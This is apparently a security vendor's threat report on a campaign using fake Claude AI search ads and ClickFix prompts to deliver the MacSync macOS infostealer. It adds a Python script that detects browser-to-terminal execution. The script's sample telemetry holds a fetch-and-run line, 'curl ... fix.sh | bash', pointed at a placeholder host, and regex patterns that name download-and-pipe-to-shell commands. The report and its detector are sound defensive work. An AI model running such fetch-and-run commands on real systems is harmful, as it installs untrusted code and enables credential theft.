Fake Claude AI Ads Used to Deliver macOS Infostealer Malware

Overview

A new malvertising campaign is targeting macOS users through fake Google Search advertisements and deceptive AI download portals impersonating popular tools such as Claude AI.

According to publicly shared threat research, attackers are combining:

  • sponsored Google Ads
  • trusted hosting platforms
  • ClickFix social engineering
  • fake AI desktop installers

to distribute a macOS infostealer known as MacSync.

The campaign highlights the growing focus of threat actors on:

  • macOS environments
  • AI-themed phishing
  • credential theft
  • browser session hijacking

How the Attack Works

The campaign begins with sponsored Google Ads appearing in searches related to:

  • Claude AI
  • AI desktop tools
  • productivity applications
  • developer software

The ads closely resemble legitimate vendor promotions and frequently leverage:

  • convincing branding
  • trusted hosting infrastructure
  • SEO manipulation tactics

Victims are redirected to fake landing pages hosted through:

  • Google Sites
  • Framer
  • Claude.ai shared chats
  • other legitimate cloud platforms

By abusing trusted infrastructure, attackers reduce the likelihood of detection by:

  • domain reputation filters
  • web gateways
  • automated blocking systems

The ClickFix Technique

The operation also uses ClickFix-style social engineering.

Victims are shown:

  • fake warning dialogs
  • installation errors
  • compatibility issues
  • prompts requesting a “fix”

Users are then instructed to:

  • execute terminal commands
  • install helper applications
  • launch malicious installers

This allows the malware payload to execute without requiring an exploit or software vulnerability.

What the Malware Does

Once executed, MacSync operates as a macOS infostealer.

Researchers report that the malware targets:

  • browser credentials
  • saved passwords
  • session tokens
  • cryptocurrency wallet data
  • browser cookies
  • authentication information

The collected data is exfiltrated to attacker-controlled infrastructure.

Researchers also observed:

  • rapid domain rotation
  • dynamic redirect infrastructure
  • rotating hosting providers
  • short-lived malicious landing pages

Why It Matters

This campaign highlights several important trends.

1. AI branding is becoming a phishing lure

The popularity of AI tools creates strong user trust and lowers suspicion.

2. macOS is no longer a secondary target

More malware campaigns are actively targeting:

  • developers
  • executives
  • designers
  • crypto users
  • SaaS-focused environments

that frequently rely on macOS devices.

3. Trusted platforms are being weaponized

Google Sites, Framer, and similar services are increasingly used as delivery infrastructure to bypass traditional filtering controls.

DIAMATIX Perspective

This campaign does not rely on exploits or zero-day vulnerabilities.

The primary risk comes from:

  • user trust
  • legitimate-looking infrastructure
  • social engineering
  • trusted cloud services
  • manual user execution

This makes detection significantly harder, especially when:

  • traffic appears legitimate
  • domains are trusted
  • no exploit behavior exists
  • execution is initiated by the user

CISO Analysis

This case demonstrates why modern phishing detection can no longer rely only on:

  • reputation checks
  • domain blacklists
  • traditional AV signatures

Organizations need visibility into:

  • unusual script execution
  • browser-to-terminal activity
  • abnormal macOS process chains
  • suspicious token access
  • cloud-hosted malware delivery patterns

AI-themed phishing campaigns are likely to continue increasing throughout 2026.

What this means for your environment

  • This type of attack relies on trusted cloud infrastructure and user-driven execution, not exploit chains
  • Detection depends on endpoint visibility and behavioral monitoring, especially around browser and terminal activity
  • Response requires a combination of user awareness, endpoint telemetry, and cloud traffic analysis
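As an added illustration of the "browser-to-terminal" visibility called for above (this is example detection logic written for this summary, not code from the researchers or from DIAMATIX), the script below correlates a browser navigation with a terminal-launched shell whose command line pipes remote or decoded content into an interpreter. The JSON-lines telemetry format, the field names and the sample events are all constructed assumptions; a real EDR feed would need its own field mapping.

```python
import json
import re

# Constructed sample telemetry (not from the article): one ClickFix-like chain and one benign shell.
SAMPLE_EVENTS = """\
{"ts": 1000, "kind": "proc", "pid": 500, "ppid": 1, "name": "Google Chrome", "cmdline": "Google Chrome"}
{"ts": 1040, "kind": "nav", "pid": 500, "url": "https://example.invalid/claude-desktop-download"}
{"ts": 1042, "kind": "proc", "pid": 610, "ppid": 1, "name": "Terminal", "cmdline": "Terminal"}
{"ts": 1043, "kind": "proc", "pid": 611, "ppid": 610, "name": "zsh", "cmdline": "/bin/zsh -l"}
{"ts": 1050, "kind": "proc", "pid": 612, "ppid": 611, "name": "bash", "cmdline": "/bin/bash -c curl -fsSL https://example.invalid/fix.sh | bash"}
{"ts": 1300, "kind": "proc", "pid": 700, "ppid": 1, "name": "Terminal", "cmdline": "Terminal"}
{"ts": 1301, "kind": "proc", "pid": 701, "ppid": 700, "name": "zsh", "cmdline": "/bin/zsh -l"}
{"ts": 1320, "kind": "proc", "pid": 702, "ppid": 701, "name": "git", "cmdline": "git status"}
"""

BROWSERS = {"Google Chrome", "Safari", "firefox", "Arc", "Brave Browser"}
TERMINALS = {"Terminal", "iTerm2"}
# Command shapes worth alerting on: fetched or decoded content piped straight into an interpreter.
SUSPICIOUS = [
    re.compile(r"\b(curl|wget)\b.*\|\s*(sh|bash|zsh|osascript|python3?)\b"),
    re.compile(r"base64\s+(-[dD]|--decode)\b.*\|\s*(sh|bash|zsh|osascript)\b"),
]
NAV_WINDOW = 300  # seconds allowed between the last browser navigation and the shell command

def ancestry(procs, pid):
    """Walk ppid links to the root, returning process names from child to root."""
    chain = []
    while pid in procs:
        chain.append(procs[pid]["name"])
        pid = procs[pid]["ppid"]
    return chain

def detect(jsonl):
    """Return one alert per suspicious command that ran under a terminal shortly after browsing."""
    events = [json.loads(line) for line in jsonl.splitlines() if line.strip()]
    procs = {e["pid"]: e for e in events if e["kind"] == "proc"}
    navs = [e for e in events if e["kind"] == "nav"
            and procs.get(e["pid"], {}).get("name") in BROWSERS]
    alerts = []
    for e in events:
        if e["kind"] != "proc" or not any(p.search(e["cmdline"]) for p in SUSPICIOUS):
            continue
        chain = ancestry(procs, e["pid"])
        if not any(name in TERMINALS for name in chain):
            continue  # this rule only covers user-driven execution from a terminal app
        recent = [n for n in navs if 0 <= e["ts"] - n["ts"] <= NAV_WINDOW]
        alerts.append({"pid": e["pid"], "chain": " <- ".join(chain), "cmdline": e["cmdline"],
                       "preceding_url": recent[-1]["url"] if recent else None})
    return alerts

if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(alert)
```

The benign `git status` chain produces no alert; the terminal shell that pipes a download into `bash` is flagged together with the browser URL visited just before it, which is the context an analyst needs to tie the execution back to the landing page.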

Would your environment detect browser-to-terminal execution on macOS endpoints?
Do you have visibility into AI-themed phishing activity targeting employees?
See how these attack chains are investigated and handled in real operational environments.

Sources

  • Independent threat research published on X by Berk Albayrak and g0njxa
  • Public malware infrastructure analysis
  • Industry reporting on ClickFix and macOS infostealer campaigns
  • Google Ads malvertising research (May 2026)